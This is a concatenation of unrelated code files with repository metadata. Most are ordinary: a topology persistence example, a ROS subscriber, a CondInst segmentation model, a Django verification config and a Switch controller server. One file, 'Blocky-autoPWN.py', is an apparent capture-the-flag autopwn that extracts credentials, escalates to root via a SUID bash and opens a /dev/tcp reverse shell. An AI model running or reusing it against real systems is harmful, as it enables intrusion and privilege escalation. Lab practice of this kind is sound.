] | null | null | null | from __future__ import print_function
from topologylayer.functional.persistence import SimplicialComplex, persistenceForwardCohom
from topologylayer.util.process import remove_zero_bars
import torch
# first, we build our complex
s = SimplicialComplex()
# a cycle graph on vertices 1,2,3,4
# cone with vertex 0
s.append([0])
s.append([1])
s.append([2])
s.append([3])
s.append([4])
s.append([0,1])
s.append([0,2])
s.append([0,3])
s.append([0,4])
s.append([1,2])
s.append([1,3])
s.append([4,2])
s.append([4,3])
s.append([0,1,2])
s.append([0,1,3])
s.append([0,2,4])
s.append([0,3,4])
# initialize internal data structures
s.initialize()
# function on vertices
# we are doing sub-level set persistence
# expect single H0 [0,inf]
# expect single H1 [0,2]
f = torch.Tensor([2., 0., 0., 0., 0.])
# extend filtration to simplical complex
s.extendFloat(f)
# compute persistence with MAXDIM=1
ret = persistenceForwardCohom(s, 1)
for k in range(2):
print("dimension %d bars" % k)
print(remove_zero_bars(ret[k]))
| 20.960784 | 92 | 0.669785 |
3ada4a4b168c9f32d42b44792e037eaf4b8ba00b | 4,020 | py | Python | python/featureextraction/subscriber.py | JonathanCamargo/Eris | 34c389f0808c8b47933605ed19d98e62280e56dd | [
"MIT"
] | null | null | null | python/featureextraction/subscriber.py | JonathanCamargo/Eris | 34c389f0808c8b47933605ed19d98e62280e56dd | [
"MIT"
] | null | null | null | python/featureextraction/subscriber.py | JonathanCamargo/Eris | 34c389f0808c8b47933605ed19d98e62280e56dd | [
"MIT"
] | null | null | null | import rospy
import threading
import importlib
from collections import deque
from custom_msgs.msg import *
def Subscriber(topic_name,type_str, window):
#creates a subscriber for topic topic_name
#using the class given as a string: type_str
# in the form package_name/message_type
# or in the form package_name.msg.message_type
# alternatively type_str can be passed not as an str, but as the actual msg class
# returns the subscriber instance
try:
if not (type(type_str)==str):
type_str=type_str.__module__
if type(type_str)==str:
if '/' in type_str:
split_type=type_str.split('/')
package_name=split_type[0]
class_name=split_type[1]
if '.' in type_str:
split_type=type_str.split('.')
package_name=split_type[0]
class_name=split_type[2]
class_name=class_name[1:]
module_=importlib.import_module(package_name+'.msg')
data_class=getattr(module_,class_name)
subscriber=GenericSubscriber(topic_name,data_class, window)
except ImportError as e:
print('ERROR in '+package_name+'.msg')
raise ImportError("package %s not found %s"%(package_name,e))
return subscriber
# A generic subscriber class for interfacing any type of message into the GUI
class GenericSubscriber(object):
def __init__(self,topic,data_class,QUEUE_SIZE=1000):
#Properties
self.topic="" # topic name (e.g. /myrobot/someNamespace/somemessage)
self.data_class="" # type of message in the form 'package_name/message_type' e.g. 'custom_msgs/JointState
self.registered = False #indicates if subscriber is registered (i.e. listening to data)
self.paused = False #indicates if subscriber pauses appending data to the queue
self.channels = None
self.queue = deque(maxlen=QUEUE_SIZE) #Queue for saving data
self.subs = None # subscriber object
if topic!="":
self.topic=topic
if data_class!="":
self.topic=topic
self.data_class=data_class
self.channels=self.data_class.__slots__
self.channel_types=self.data_class._slot_types
def callback(self,msg):
if __debug__:
pass
#rospy.loginfo(rospy.get_caller_id()+" %s",msg)
if self.paused==False:
#Get each field in the message
data=[]
for channel in self.channels:
if channel == 'header':
#If header just take the timestamp
time=msg.header.stamp.secs+msg.header.stamp.nsecs/1.0E9
data.append(time)
else:
data.append(getattr(msg,channel))
self.append(data)
def listener(self):
try:
self.subs=rospy.Subscriber(self.topic, self.data_class, self.callback)
except:
print("Could not subscribe")
else:
self.registered=True
def append(self, newElement):
if self.paused == False:
self.queue.append(newElement)
def getQueue(self):
return list(self.queue)
def getChannels(self):
return self.channels
def unsubscribe(self):
if self.subs is not None:
self.subs.unregister()
self.registered=False
def subscribe(self):
if self.registered is False:
self.t=threading.Thread(target=self.listener())
self.t.start()
self.registered=True
def __str__(self):
''' Overload str to use print for the subcriber'''
string_1="Topic: {0}\nChannels:{1}\nChannel types:{2}\n".format(self.topic,self.channels,self.channel_types)
if self.registered is True:
string_2="This subscriber is registered"
else:
string_2="This subscriber is NOT registered"
return string_1+string_2
| 34.358974 | 116 | 0.615672 |
3adcb0e64f1098771d6fe0dddfcf3ecb6a0a3c9a | 19,324 | py | Python | scripts/condinst.py | Spritaro/condinst_tensorrt | 22063a75e015bba45b588cdb6ebf1ac663ff1924 | [
"MIT"
] | 3 | 2021-11-14T14:11:10.000Z | 2022-02-16T11:42:40.000Z | scripts/condinst.py | datomi79/condinst_tensorrt | 22063a75e015bba45b588cdb6ebf1ac663ff1924 | [
"MIT"
] | null | null | null | scripts/condinst.py | datomi79/condinst_tensorrt | 22063a75e015bba45b588cdb6ebf1ac663ff1924 | [
"MIT"
] | 1 | 2022-02-14T21:47:55.000Z | 2022-02-14T21:47:55.000Z | import math
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn
from torch.utils.data import DataLoader, random_split
from torch.utils.tensorboard import SummaryWriter
import torchvision
# from torchvision.models.detection.backbone_utils import resnet_fpn_backbone
# from torchvision.ops.focal_loss import sigmoid_focal_loss
from loss import heatmap_focal_loss
from loss import dice_loss
def get_centroid_indices(masks):
"""
Params:
masks: Tensor[num_objects, height, width]
Returns:
centroids: Tensor[num_objects, (x, y)]
"""
_, height, width = masks.shape
dtype = masks.dtype
device = masks.device
location_x = torch.arange(0, width, 1, dtype=dtype, device=device) # Tensor[width]
location_y = torch.arange(0, height, 1, dtype=dtype, device=device) # Tensor[height]
total_area = masks.sum(dim=(1,2)) + 1e-9
centroids_x = torch.sum(masks.sum(dim=1) * location_x[None,:], dim=1) / total_area # Tensor[num_objects]
centroids_y = torch.sum(masks.sum(dim=2) * location_y[None,:], dim=1) / total_area # Tensor[num_objects]
centroids = torch.stack((centroids_x, centroids_y), dim=1) # Tensor[num_objects, (x, y)]
centroids = centroids.to(torch.int64)
return centroids
def generate_heatmap(gt_labels, gt_masks, num_classes):
"""
Params:
gt_labels: Tensor[num_objects]
gt_masks: Tensor[num_objects, height, width]
num_classes:
Returns:
heatmap: Tensor[num_classes, height, width]
centroids: Tensor[num_objects, (x, y)]
"""
num_objects, height, width = gt_masks.shape
dtype = gt_masks.dtype
device = gt_masks.device
centroids = get_centroid_indices(gt_masks) # Tensor[num_objects, (x, y)]
radius2 = torch.sum(gt_masks, dim=(1, 2)) / height / width * 10 + 1
location_x = torch.arange(0, width, 1, dtype=dtype, device=device) # Tensor[width]
location_y = torch.arange(0, height, 1, dtype=dtype, device=device) # Tensor[height]
location_y, location_x = torch.meshgrid(location_y, location_x) # [height, width], [height, width]
heatmap = torch.zeros(size=(num_classes, height, width), dtype=dtype, device=device)
for i in range(num_objects):
label = gt_labels[i]
px = centroids[i][0]
py = centroids[i][1]
single_heatmap = torch.exp(-((location_x-px)**2 + (location_y-py)**2) / (2. * radius2[i]))
# Take element-wise maximum in case of overlapping objects
heatmap[label,:,:] = torch.maximum(heatmap[label,:,:], single_heatmap)
return heatmap, centroids
def get_heatmap_peaks(cls_logits, topk, kernel=3):
"""
Params:
cls_logits: Tensor[num_batch, num_classes, height, width]
topk: Int
kernel: Int
Returns:
labels: Tensor[num_batch, topk]
cls_preds: Tensor[num_batch, topk]
points: Tensor[num_batch, topk, (x, y)]
"""
num_batch, num_classes, height, width = cls_logits.shape
device = cls_logits.device
# Get peak maps
heatmap_preds = cls_logits.sigmoid() # Tensor[num_batch, num_classes, height, width]
pad = (kernel - 1) // 2
heatmap_max = F.max_pool2d(heatmap_preds, (kernel, kernel), stride=1, padding=pad) # Tensor[num_batch, num_classes, height, width]
peak_map = (heatmap_max == heatmap_preds).to(dtype=heatmap_preds.dtype)
peak_map = peak_map * heatmap_preds
peak_map = peak_map.view(num_batch, -1) # Tensor[num_batch, (num_classes*height*width)]
# Get properties of each peak
# NOTE: TensorRT7 does not support rounding_mode='floor' for toch.div()
cls_preds, keep_idx = torch.topk(peak_map, k=topk, dim=1) # [num_batch, topk], [num_batch, topk]
labels = torch.div(keep_idx, height*width).long() # [num_batch, topk]
yx_idx = torch.remainder(keep_idx, height*width).long() # [num_batch, topk]
ys = torch.div(yx_idx, width).long() # [num_batch, topk]
xs = torch.remainder(yx_idx, width).long() # [num_batch, topk]
points = torch.stack([xs, ys], dim=2) # Tensor[num_batch, topk, (x,y)]
return labels, cls_preds, points
class CondInst(nn.Module):
def __init__(self, mode, input_channels, num_classes, topk):
super().__init__()
assert mode in ['training', 'inference']
self.mode = mode
self.topk = topk
self.num_filters = 8
self.conv1_w = (self.num_filters + 2) * self.num_filters
self.conv2_w = self.conv1_w + self.num_filters * self.num_filters
self.conv3_w = self.conv2_w + self.num_filters * 1
self.conv1_b = self.conv3_w + self.num_filters
self.conv2_b = self.conv1_b + self.num_filters
self.conv3_b = self.conv2_b + 1
num_channels = self.conv3_b
# self.backbone = resnet_fpn_backbone('resnet50', pretrained=True, trainable_layers=0)
# self.backbone = resnet_fpn_backbone('resnet34', pretrained=True, trainable_layers=5)
self.backbone = torchvision.models.resnet50(pretrained=True)
self.lateral_conv2 = nn.Sequential(
nn.Conv2d(in_channels=256, out_channels=256, kernel_size=1, padding=0, bias=False),
nn.BatchNorm2d(num_features=256)
)
self.lateral_conv3 = nn.Sequential(
nn.Conv2d(in_channels=512, out_channels=256, kernel_size=1, padding=0, bias=False),
nn.BatchNorm2d(num_features=256)
)
self.lateral_conv4 = nn.Sequential(
nn.Conv2d(in_channels=1024, out_channels=256, kernel_size=1, padding=0, bias=False),
nn.BatchNorm2d(num_features=256)
)
self.lateral_conv5 = nn.Sequential(
nn.Conv2d(in_channels=2048, out_channels=256, kernel_size=1, padding=0, bias=False),
nn.BatchNorm2d(num_features=256)
)
self.cls_head = nn.Sequential(
nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(num_features=256),
nn.ReLU(),
nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(num_features=256),
nn.ReLU(),
nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(num_features=256),
nn.ReLU(),
nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(num_features=256),
nn.ReLU(),
nn.Conv2d(in_channels=256, out_channels=num_classes, kernel_size=1, padding=0)
)
self.ctr_head = nn.Sequential(
nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(num_features=256),
nn.ReLU(),
nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(num_features=256),
nn.ReLU(),
nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(num_features=256),
nn.ReLU(),
nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(num_features=256),
nn.ReLU(),
nn.Conv2d(in_channels=256, out_channels=num_channels, kernel_size=1, padding=0)
)
self.mask_head = nn.Sequential(
nn.Conv2d(in_channels=256, out_channels=128, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(num_features=128),
nn.ReLU(),
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(num_features=128),
nn.ReLU(),
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(num_features=128),
nn.ReLU(),
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(num_features=128),
nn.ReLU(),
nn.Conv2d(in_channels=128, out_channels=self.num_filters, kernel_size=1, padding=0)
)
# Initialize
def initialize(m):
if isinstance(m, nn.Conv2d):
nn.init.normal_(m.weight, std=0.01)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.ConvTranspose2d):
nn.init.normal_(m.weight, std=0.01)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
self.lateral_conv2.apply(initialize)
self.lateral_conv3.apply(initialize)
self.lateral_conv4.apply(initialize)
self.lateral_conv5.apply(initialize)
self.cls_head.apply(initialize)
self.ctr_head.apply(initialize)
self.mask_head.apply(initialize)
# Initialize last layer of class head
# NOTE: see Focal Loss paper for detail https://arxiv.org/abs/1708.02002
pi = 0.01
bias = -math.log((1 - pi) / pi)
nn.init.constant_(self.cls_head[-1].bias, bias)
# Change number of input channels
if input_channels != 3:
output_channels, _, h, w = self.backbone.conv1.weight.shape
weight = torch.zeros(output_channels, input_channels, h, w)
nn.init.normal_(weight, std=0.01)
weight[:, :3, :, :] = self.backbone.conv1.weight
self.backbone.conv1.weight = nn.Parameter(weight, requires_grad=True)
# self.backbone.conv1.apply(initialize)
def forward(self, images):
# Convert input images to FP32 or FP16 depending on backbone dtype
images = images.to(dtype=self.backbone.conv1.weight.dtype)
# Backbone
x = self.backbone.conv1(images)
x = self.backbone.bn1(x)
x = self.backbone.relu(x)
x = self.backbone.maxpool(x)
c2 = self.backbone.layer1(x) # 1/4
c3 = self.backbone.layer2(c2) # 1/8
c4 = self.backbone.layer3(c3) # 1/16
c5 = self.backbone.layer4(c4) # 1/32
# FPN
p5 = self.lateral_conv5(c5)
p4 = self.lateral_conv4(c4) + F.interpolate(p5, scale_factor=2, mode='bilinear', align_corners=False)
p3 = self.lateral_conv3(c3) + F.interpolate(p4, scale_factor=2, mode='bilinear', align_corners=False)
p2 = self.lateral_conv2(c2) + F.interpolate(p3, scale_factor=2, mode='bilinear', align_corners=False)
x = p3
cls_logits = self.cls_head(x) # [num_batch, num_classes, feature_height, feature_width]
ctr_logits = self.ctr_head(x) # [num_batch, num_channels, feature_height, feature_width]
x = p2
mask_logits = self.mask_head(x) # [num_batch, num_filters, mask_height, mask_width]
if self.mode == 'training':
return cls_logits, ctr_logits, mask_logits
else:
labels, scores, points = get_heatmap_peaks(cls_logits, topk=self.topk)
num_batch, num_objects, _ = points.shape
masks = []
for i in range(num_batch):
mask = self.generate_mask(ctr_logits[i], mask_logits[i], points[i])
masks.append(mask)
masks = torch.stack(masks, dim=0)
return labels.int(), scores.float(), masks.float()
def generate_mask(self, ctr_logits, mask_logits, centroids):
"""
Params:
ctr_logits: Tensor[num_channels, feature_height, feature_width]
mask_logits: Tensor[num_filters, mask_height, mask_width]
centroids: Tensor[num_objects, (x, y)]
Returns:
masks: Tensor[num_objects, mask_height, mask_width]
"""
_, feature_height, feature_width = ctr_logits.shape
_, mask_height, mask_width = mask_logits.shape
num_objects, _ = centroids.shape
dtype = ctr_logits.dtype
device = ctr_logits.device
# Absolute coordinates
# NOTE: TensorRT7 does not support float range operation. Use cast instead.
location_x = torch.arange(0, mask_width, 1, dtype=torch.int32, device=device) # Tensor[mask_width]
location_y = torch.arange(0, mask_height, 1, dtype=torch.int32, device=device) # Tensor[mask_height]
location_x = location_x.to(dtype)
location_y = location_y.to(dtype)
location_y, location_x = torch.meshgrid(location_y, location_x) # Tensor[mask_height, mask_width], Tensor[mask_height, mask_width]
location_xs = location_x[None,:,:].repeat(num_objects, 1, 1) # Tensor[num_objects, mask_height, mask_width]
location_ys = location_y[None,:,:].repeat(num_objects, 1, 1) # Tensor[num_objects, mask_height, mask_width]
# Relative coordinates
location_xs -= centroids[:, 0].view(-1, 1, 1) * (mask_width // feature_width) # Tensor[num_objects, mask_height, mask_width]
location_ys -= centroids[:, 1].view(-1, 1, 1) * (mask_height // feature_height) # Tensor[num_objects, mask_height, mask_width]
# location_xs /= mask_width
# location_ys /= mask_height
# Add relative coordinates to mask features
mask_logits = mask_logits[None,:,:,:].expand(num_objects, self.num_filters, mask_height, mask_width) # Tensor[num_objects, num_filters, mask_height, mask_width]
mask_logits = torch.cat([mask_logits, location_xs[:,None,:,:], location_ys[:,None,:,:]], dim=1) # Tensor[num_objects, num_filters+2, mask_height, mask_width]
# Create instance-aware mask head
px = centroids[:,0] # Tensor[num_objects]
py = centroids[:,1] # Tensor[num_objects]
weights1 = ctr_logits[:self.conv1_w, py, px].view(self.num_filters, self.num_filters+2, num_objects, 1)
weights2 = ctr_logits[self.conv1_w:self.conv2_w, py, px].view(self.num_filters, self.num_filters, num_objects, 1)
weights3 = ctr_logits[self.conv2_w:self.conv3_w, py, px].view(1, self.num_filters, num_objects, 1)
biases1 = ctr_logits[self.conv3_w:self.conv1_b, py, px]
biases2 = ctr_logits[self.conv1_b:self.conv2_b, py, px]
biases3 = ctr_logits[self.conv2_b:self.conv3_b, py, px]
# Apply mask head to mask features with relative coordinates
# NOTE: TensorRT7 does not support dynamic filter for conv2d. Use matmul instead.
# NOTE: matmul is used in the following way: [N, H*W, 1, C1] * [N, 1, C1, C2] = [N, H*W, 1, C2]
x = mask_logits.view(num_objects, self.num_filters+2, -1, 1) # Tensor[num_objects, num_filters+2, mask_height*mask_width, 1]
x = x.permute(0, 2, 3, 1) # Tensor[num_objects, mask_height*mask_width, 1, num_filters+2]
weights1 = weights1.permute(2, 3, 1, 0) # Tensor[num_objects, 1, num_filters+2, num_filters]
x = torch.matmul(x, weights1) # Tensor[num_objects, mask_height*mask_width, 1, num_filters]
biases1 = biases1[:, None, None, :].permute(3, 1, 2, 0) # Tensor[num_object, 1, 1, num_filters]
x = x + biases1
x = F.relu(x)
weights2 = weights2.permute(2, 3, 1, 0) # Tensor[num_objects, 1, num_filters, num_filters]
x = torch.matmul(x, weights2) # Tensor[num_objects, mask_height*mask_width, 1, num_filters]
biases2 = biases2[:, None, None, :].permute(3, 1, 2, 0) # Tensor[num_object, 1, 1, num_filters]
x = x + biases2
x = F.relu(x)
weights3 = weights3.permute(2, 3, 1, 0) # Tensor[num_objects, 1, num_filters, 1]
x = torch.matmul(x, weights3) # Tensor[num_objects, mask_height*mask_width, 1, 1]
biases3 = biases3[:, None, None, :].permute(3, 1, 2, 0) # Tensor[num_objects, 1, 1, 1]
x = x + biases3
x = x.view(num_objects, mask_height, mask_width) # Tensor[num_objects, mask_height, mask_width]
masks = torch.sigmoid(x)
return masks
def loss(self, cls_logits, ctr_logits, mask_logits, targets):
"""
Params:
cls_logits: Tensor[num_batch, num_classes, feature_height, feature_width]
ctr_logits: Tensor[num_batch, num_channels, feature_height, feature_width]
mask_logits: Tensor[num_batch, num_filters, mask_height, mask_width]
targets: List[List[Dict{'class_labels': int, 'segmentations': Tensor[image_height, image_width]}]]
Returns:
heatmap_loss: Tensor[]
mask_loss: Tensor[]
"""
num_batch, num_classes, feature_height, feature_width = cls_logits.shape
num_batch, num_filters, mask_height, mask_width = mask_logits.shape
dtype = cls_logits.dtype
device = cls_logits.device
# Assign each GT mask to one point in feature map, then calculate loss
heatmap_losses = []
mask_losses = []
for i in range(num_batch):
num_objects = len(targets[i])
# # Skip if no object in targets
# if len(targets[i]) == 0:
# heatmap_losses.append(torch.tensor(0, dtype=dtype, device=device))
# mask_losses.append(torch.tensor(0, dtype=dtype, device=device))
# continue
if num_objects > 0:
# Convert list of dicts to Tensors
gt_labels = torch.as_tensor([obj['class_labels'] for obj in targets[i]], dtype=torch.int64, device=device) # Tensor[num_objects]
gt_masks = torch.stack([torch.as_tensor(obj['segmentation'], dtype=dtype, device=device) for obj in targets[i]], dim=0) # Tensor[num_objects, image_height, image_width]
# Downsample GT masks
gt_masks_size_feature = F.interpolate(gt_masks[None,...], size=(feature_height, feature_width)) # Tensor[1, num_objects, feature_height, feature_width]
gt_masks_size_feature = gt_masks_size_feature[0,...] # Tensor[num_objects, feature_height, feature_width]
# Generate GT heatmap
gt_heatmap, gt_centroids = generate_heatmap(gt_labels, gt_masks_size_feature, num_classes) # Tensor[num_classes, feature_height, feature_width], Tensor[num_objects, (x, y)]
# Generate mask for each object
masks = self.generate_mask(ctr_logits[i], mask_logits[i], gt_centroids) # Tensor[num_objects, mask_height, mask_width]
# Calculate loss
heatmap_loss = heatmap_focal_loss(cls_logits[i].sigmoid(), gt_heatmap, alpha=2, gamma=4) / num_objects
gt_masks_size_mask = F.adaptive_avg_pool2d(gt_masks[None,...], output_size=(mask_height, mask_width))
mask_loss = dice_loss(masks, gt_masks_size_mask)
else:
# No GT objects
gt_heatmap = torch.zeros_like(cls_logits[i])
heatmap_loss = heatmap_focal_loss(cls_logits[i].sigmoid(), gt_heatmap, alpha=2, gamma=4)
mask_loss = torch.tensor(0, dtype=dtype, device=device, requires_grad=True)
heatmap_losses.append(heatmap_loss)
mask_losses.append(mask_loss)
heatmap_loss =torch.stack(heatmap_losses, dim=0).mean()
mask_loss = torch.stack(mask_losses).mean()
return heatmap_loss, mask_loss
| 48.431078 | 188 | 0.644328 |
3adcf1fe5d6dea4fb1870fe9017321b2ad54e8fe | 3,278 | py | Python | Blocky-autoPWN.py | z3rObyte/HackTheBox-Autopwn | 6477f43a0a845adee715ffe1bc4ade62aeb3e679 | [
"Apache-2.0"
] | 1 | 2021-08-25T14:01:13.000Z | 2021-08-25T14:01:13.000Z | Blocky-autoPWN.py | z3rObyte/HackTheBox-Autopwn | 6477f43a0a845adee715ffe1bc4ade62aeb3e679 | [
"Apache-2.0"
] | null | null | null | Blocky-autoPWN.py | z3rObyte/HackTheBox-Autopwn | 6477f43a0a845adee715ffe1bc4ade62aeb3e679 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
import zipfile
from pwn import * # pip3 install pwn
banner = """
____ __ __ __ ____ _ ___ __
/ __ )/ /___ _____/ /____ __ ____ ___ __/ /_____ / __ \ | / / | / /
/ __ / / __ \/ ___/ //_/ / / /_____/ __ `/ / / / __/ __ \/ /_/ / | /| / / |/ /
/ /_/ / / /_/ / /__/ ,< / /_/ /_____/ /_/ / /_/ / /_/ /_/ / ____/| |/ |/ / /| /
/_____/_/\____/\___/_/|_|\__, / \__,_/\__,_/\__/\____/_/ |__/|__/_/ |_/
/____/
by z3r0byte <3
"""
# ctrl + c
def def_handler(sig, frame):
print("\n[!] Saliendo...\n")
os.system("rm -rf com/ META-INF/ *sh *zip")
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
# variables globales
plugin_url = 'http://10.10.10.37/plugins/files/BlockyCore.jar'
blog_post_url = 'http://10.10.10.37/index.php/2017/07/02/welcome-to-blockycraft/'
# main function
def main():
# Mostramos el banner
print(banner)
# Descargamos el plugin
p1 = log.progress("Extracción de credenciales")
p1.status("Descargando plugin")
time.sleep(2)
plugin = requests.get(plugin_url)
open('./plugin.zip', 'wb').write(plugin.content)
# descomprimimos plugin
p1.status("Descomprimiendo plugin")
time.sleep(2)
with zipfile.ZipFile("plugin.zip","r") as zip_file:
zip_file.extractall("./")
# buscamos contraseña dentro del plugin
p1.status("Buscando contraseña dentro del plugin")
time.sleep(2)
password = subprocess.check_output("strings com/myfirstplugin/BlockyCore.class | sed -n '11p'", shell=True, universal_newlines=True)
# Extraemos usuario del blog de wordpress
p1.status("Extrayendo usuario")
time.sleep(2)
r = requests.get(blog_post_url)
username = re.findall(r'author/notch/">(.*?)</a></span>', r.text)[0]
p1.success()
# Hacemos un tratamiento de las credenciales para quitar espacios y saltos de línea innecesarios
password = password.strip("\n")
password = password.strip()
username = username.lower()
# creamos archivos para escalada de privilegios
os.system("echo \"#!/bin/bash \nchmod u+s /bin/bash\" > bash-SUID.sh")
LHOST=str(input("Introduce tu LHOST tun0 -> "))
LHOST = LHOST.strip("\n")
os.system("echo \"#!/bin/bash \nbash -i >& /dev/tcp/"+LHOST+"/4444 0>&1\" > revshell.sh")
# conexión via SSH y escalada de privilegios
def SSH():
shell = ssh(username, '10.10.10.37', password=password, port=22)
shell.upload(b"./bash-SUID.sh", remote="/tmp/bash-SUID.sh")
shell.upload(b"./revshell.sh", remote="/tmp/revshell.sh")
term = shell.run(b"bash")
term.sendline("echo "+password+" | sudo -S bash /tmp/bash-SUID.sh")
term.sendline("bash /tmp/revshell.sh")
try:
threading.Thread(target=SSH, args=()).start()
except Exception as e:
log.error(str(e))
sh = listen(4444, timeout=120).wait_for_connection()
if sh.sock is None:
sys.exit(1)
else:
sh.sendline("bash -p")
sh.interactive()
if __name__ == '__main__':
main()
| 28.017094 | 136 | 0.566809 |
3add20f0867b88372260c1d964a87cf06a4f4b64 | 1,621 | py | Python | verification/conf.py | HosseinMohammadii/django-rest-verification | 0e0d4633f4420896fbfa0005f9df49eb4ed68f88 | [
"MIT"
] | 1 | 2020-10-23T08:20:59.000Z | 2020-10-23T08:20:59.000Z | verification/conf.py | HosseinMohammadii/django-rest-verification | 0e0d4633f4420896fbfa0005f9df49eb4ed68f88 | [
"MIT"
] | null | null | null | verification/conf.py | HosseinMohammadii/django-rest-verification | 0e0d4633f4420896fbfa0005f9df49eb4ed68f88 | [
"MIT"
] | null | null | null | from django.conf import settings
from django.utils import timezone
from .base import default_config, numeric, lowercase_alphabetic, uppercase_alphabetic
config = default_config
config.update(settings.VERIFICATION)
VERIFICATION_CODE_FIELD = 'verification_code'
VERIFICATIONS = config.get('VERIFICATIONS')
CODE_LENGTH = config.get('CODE_LENGTH')
LIFE_TIME_SECOND = config.get('LIFE_TIME_SECOND')
LIFE_TIME_MINUTE = config.get('LIFE_TIME_MINUTE')
LIFE_TIME_HOUR = config.get('LIFE_TIME_HOUR')
LIFE_TIME_DAY = config.get('LIFE_TIME_DAY')
LIFE_TIME_PENALTY_SECOND = config.get('LIFE_TIME_PENALTY_SECOND')
CODE_LIEF_TIME = timezone.timedelta(
seconds=LIFE_TIME_SECOND + LIFE_TIME_PENALTY_SECOND,
minutes=LIFE_TIME_MINUTE,
hours=LIFE_TIME_HOUR,
days=LIFE_TIME_DAY,
)
ALLOWED_CODE_LETTERS = ''
if config.get('CONTAINS_NUMERIC'):
ALLOWED_CODE_LETTERS += numeric
if config.get('CONTAINS_UPPER_ALPHABETIC'):
ALLOWED_CODE_LETTERS += uppercase_alphabetic
if config.get('CONTAINS_LOWER_ALPHABETIC'):
ALLOWED_CODE_LETTERS += lowercase_alphabetic
if len(ALLOWED_CODE_LETTERS) == 0:
raise Exception("No letters are allowed for code generation")
VERIFICATIONS_DICT = {}
VERIFICATIONS_TYPES = []
VERIFICATIONS_USER_MODEL_FIELDS = []
for verification in VERIFICATIONS:
VERIFICATIONS_TYPES.append(verification.get('type'))
VERIFICATIONS_USER_MODEL_FIELDS.append(verification.get('user_model_field'))
VERIFICATIONS_DICT[verification.get('type')] = verification
def get_user_model_field(verification_type):
return VERIFICATIONS_DICT.get(verification_type, None).get('user_model_field')
| 33.770833 | 85 | 0.805676 |
3adedc706a3e7e55655cf8dce7e7f4c1476ebd61 | 13,078 | py | Python | nxbt/controller/server.py | Yamakaky/nxbt | 0fe9acaaf0fac8014f9aaee53943711a106b572c | [
"MIT"
] | null | null | null | nxbt/controller/server.py | Yamakaky/nxbt | 0fe9acaaf0fac8014f9aaee53943711a106b572c | [
"MIT"
] | null | null | null | nxbt/controller/server.py | Yamakaky/nxbt | 0fe9acaaf0fac8014f9aaee53943711a106b572c | [
"MIT"
] | null | null | null | import socket
import fcntl
import os
import time
import queue
import logging
import traceback
from .controller import Controller, ControllerTypes
from ..bluez import BlueZ
from .protocol import ControllerProtocol
from .input import InputParser
from .utils import format_msg_controller, format_msg_switch
class ControllerServer():
def __init__(self, controller_type, adapter_path="/org/bluez/hci0",
state=None, task_queue=None, lock=None, colour_body=None,
colour_buttons=None):
self.logger = logging.getLogger('nxbt')
# Cache logging level to increase performance on checks
self.logger_level = self.logger.level
if state:
self.state = state
else:
self.state = {
"state": "",
"finished_macros": [],
"errors": None,
"direct_input": None
}
self.task_queue = task_queue
self.controller_type = controller_type
self.colour_body = colour_body
self.colour_buttons = colour_buttons
if lock:
self.lock = lock
self.reconnect_counter = 0
# Intializing Bluetooth
self.bt = BlueZ(adapter_path=adapter_path)
self.controller = Controller(self.bt, self.controller_type)
self.protocol = ControllerProtocol(
self.controller_type,
self.bt.address,
colour_body=self.colour_body,
colour_buttons=self.colour_buttons)
self.input = InputParser(self.protocol)
self.slow_input_frequency = False
def run(self, reconnect_address=None):
"""Runs the mainloop of the controller server.
:param reconnect_address: The Bluetooth MAC address of a
previously connected to Nintendo Switch, defaults to None
:type reconnect_address: string or list, optional
"""
self.state["state"] = "initializing"
try:
# If we have a lock, prevent other controllers
# from initializing at the same time and saturating the DBus,
# potentially causing a kernel panic.
if self.lock:
self.lock.acquire()
try:
self.controller.setup()
if reconnect_address:
itr, ctrl = self.reconnect(reconnect_address)
else:
itr, ctrl = self.connect()
finally:
if self.lock:
self.lock.release()
self.switch_address = itr.getsockname()[0]
self.state["state"] = "connected"
self.mainloop(itr, ctrl)
except KeyboardInterrupt:
pass
except Exception:
self.state["state"] = "crashed"
self.state["errors"] = traceback.format_exc()
return self.state
def mainloop(self, itr, ctrl):
# Mainloop
while True:
# Start timing the command processing
timer_start = time.perf_counter()
# Attempt to get output from Switch
try:
reply = itr.recv(50)
if self.logger_level <= logging.DEBUG and len(reply) > 40:
self.logger.debug(format_msg_switch(reply))
except BlockingIOError:
reply = None
# Getting any inputs from the task queue
if self.task_queue:
try:
while True:
msg = self.task_queue.get_nowait()
if msg and msg["type"] == "macro":
self.input.buffer_macro(
msg["macro"], msg["macro_id"])
elif msg and msg["type"] == "stop":
self.input.stop_macro(
msg["macro_id"], state=self.state)
elif msg and msg["type"] == "clear":
self.input.clear_macros()
except queue.Empty:
pass
# Set Direct Input
if self.state["direct_input"]:
self.input.set_controller_input(self.state["direct_input"])
self.protocol.process_commands(reply)
self.input.set_protocol_input(state=self.state)
msg = self.protocol.get_report()
if self.logger_level <= logging.DEBUG and reply and len(reply) > 45:
self.logger.debug(format_msg_controller(msg))
try:
itr.sendall(msg)
except BlockingIOError:
continue
except OSError as e:
# Attempt to reconnect to the Switch
itr, ctrl = self.save_connection(e)
# Figure out how long it took to process commands
timer_end = time.perf_counter()
